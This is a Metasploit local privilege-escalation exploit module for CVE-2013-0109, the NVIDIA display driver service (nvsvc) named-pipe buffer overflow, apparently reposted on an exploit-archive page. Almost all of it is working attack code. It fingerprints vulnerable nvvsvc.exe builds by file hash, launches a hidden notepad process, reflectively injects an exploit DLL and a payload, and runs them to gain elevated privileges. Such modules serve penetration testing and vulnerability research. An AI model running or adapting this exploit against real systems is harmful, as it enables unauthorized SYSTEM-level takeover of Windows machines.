Nvidia (nvsvc) Display Driver Service Local Privilege Escalation Exploit

:
19.12.2013
:
nvvsvc.exe
:
:
NVIDIA Graphics Drivers Windows

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/windows/priv'
require 'msf/core/post/windows/process'
require 'msf/core/post/windows/reflective_dll_injection'
require 'msf/core/post/windows/services'

class Metasploit3 < Msf::Exploit::Local
Rank = AverageRanking

include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Process
include Msf::Post::Windows::ReflectiveDLLInjection
include Msf::Post::Windows::Services

def initialize(info={})
super(update_info(info, {
'Name' => 'Nvidia (nvsvc) Display Driver Service Local Privilege Escalation',
'Description' => %q{
The named pipe, \pipe\nsvr, has a NULL DACL allowing any authenticated user to
interact with the service. It contains a stacked based buffer overflow as a result
of a memmove operation. Note the slight spelling differences: the executable is 'nvvsvc.exe',
the service name is 'nvsvc', and the named pipe is 'nsvr'.

This exploit automatically targets nvvsvc.exe versions dated Nov 3 2011, Aug 30 2012, and Dec 1 2012.
It has been tested on Windows 7 64-bit against nvvsvc.exe dated Dec 1 2012.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Peter Wintersmith', # Original exploit
'Ben Campbell <eat_meatballs[at]hotmail.co.uk>', # Metasploit integration
],
'Arch' => ARCH_X86_64,
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Targets' =>
[
[ 'Windows x64', { } ]
],
'Payload' =>
{
'Space' => 2048,
'DisableNops' => true,
'BadChars' => "\x00"
},
'References' =>
[
[ 'CVE', '2013-0109' ],
[ 'OSVDB', '88745' ],
[ 'URL', 'http://nvidia.custhelp.com/app/answers/detail/a_id/3288' ],
],
'DisclosureDate' => 'Dec 25 2012',
'DefaultTarget' => 0
}))

end

def check
vuln_hashes = [
'43f91595049de14c4b61d1e76436164f',
'3947ad5d03e6abcce037801162fdb90d',
'3341d2c91989bc87c3c0baa97c27253b'
]

os = sysinfo["OS"]
if os =~ /windows/i
svc = service_info 'nvsvc'
if svc and svc['Name'] =~ /NVIDIA/i
vprint_good("Found service '#{svc['Name']}'")

begin
if is_running?
print_good("Service is running")
else
print_error("Service is not running!")
end
rescue RuntimeError => e
print_error("Unable to retrieve service status")
end

if sysinfo['Architecture'] =~ /WOW64/i
path = svc['Command'].gsub('"','').strip
path.gsub!("system32","sysnative")
else
path = svc['Command'].gsub('"','').strip
end

begin
hash = client.fs.file.md5(path).unpack('H*').first
rescue Rex::Post::Meterpreter::RequestError => e
print_error("Error checking file hash: #{e}")
return Exploit::CheckCode::Detected
end

if vuln_hashes.include?(hash)
vprint_good("Hash '#{hash}' is listed as vulnerable")
return Exploit::CheckCode::Vulnerable
else
vprint_status("Hash '#{hash}' is not recorded as vulnerable")
return Exploit::CheckCode::Detected
end
else
return Exploit::CheckCode::Safe
end
end
end

def is_running?
begin
status = service_status('nvsvc')
return (status and status[:state] == 4)
rescue RuntimeError => e
print_error("Unable to retrieve service status")
return false
end
end

def exploit
if is_system?
fail_with(Exploit::Failure::None, 'Session is already elevated')
end

unless check == Exploit::CheckCode::Vulnerable
fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.")
end

print_status("Launching notepad to host the exploit...")

windir = expand_path("%windir%")
cmd = "#{windir}\\SysWOW64\\notepad.exe"
process = client.sys.process.execute(cmd, nil, {'Hidden' => true})
host_process = client.sys.process.open(process.pid, PROCESS_ALL_ACCESS)
print_good("Process #{process.pid} launched.")

print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
library_path = ::File.join(Msf::Config.data_directory,
"exploits",
"CVE-2013-0109",
"nvidia_nvsvc.x86.dll")
library_path = ::File.expand_path(library_path)

print_status("Injecting exploit into #{process.pid} ...")
exploit_mem, offset = inject_dll_into_process(host_process, library_path)

print_status("Exploit injected. Injecting payload into #{process.pid}...")
payload_mem = inject_into_process(host_process, payload.encoded)

# invoke the exploit, passing in the address of the payload that
# we want invoked on successful exploitation.
print_status("Payload injected. Executing exploit...")
host_process.thread.create(exploit_mem + offset, payload_mem)

print_good("Exploit finished, wait for (hopefully privileged) payload execution to complete.")
end
end

CAPTCHA